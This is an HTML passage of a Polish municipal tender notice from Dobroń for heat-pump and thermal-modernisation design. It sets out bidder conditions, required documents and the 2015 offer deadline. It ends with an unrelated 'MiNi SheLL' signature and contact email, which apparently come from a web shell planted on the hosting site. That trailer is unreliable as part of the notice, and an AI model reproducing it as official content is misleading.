<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy,  w tym okresie wykonał   co najmniej  trzy projekty technologii pomp ciepła zastosowanych jako źródło ciepła ogrzewania budynków użyteczności publicznej w tym jedna o mocy minimum 150 kW,  co najmniej jeden  projekt wielobranżowy termomodernizacji budynków użyteczności publicznej o wartości projektu minimum 65 tysięcy złotych, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania.
Ocena spełnienia powyższego warunku  zostanie dokonana na podstawie dokumentu pn.wykaz prac projektowych - na zał. nr 2 oraz załączonych dowodów dotyczących najważniejszych prac projektowych, określających, czy prace projektowe zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia art. 22 ust.1 ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje osobami, które będą uczestniczyć w wykonaniu zamówienia, w szczególności osób odpowiedzialnych za kierowanie pracami projektowymi tj.  posiadanie uprawnień budowlanych w specjalności architektonicznej, konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Ocena spełnienia powyższego warunku zostanie dokonana na podstawie przedłożonych w ofercie dokumentów i oświadczeń tj. Wykazu osób uczestniczących w wykonywaniu zamówienia - na zał.3 oraz oświadczenia o posiadaniu przez wskazane osoby wymaganych uprawnień- zał. 4</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  posiada  ważną  polisę  ubezpieczeniową  O.C.  o  wartości  minimum 300 000,00 zł. 
Dla uznania,  że  Wykonawca  spełnia  w/w  warunek  Zamawiający  wymaga, aby Wykonawca złożył kopię polisy potwierdzoną za zgodność z oryginałem. 
Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia  - art. 22 ust.1 ustawy Pzp;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin realizcji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dobron.ug.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.dobron.ug.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2015 godzina 09:00, miejsce: Urząd Gminy w Dobroniu 
95-082 Dobroń ul. 11 Listopada 9
pokój nr 1 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com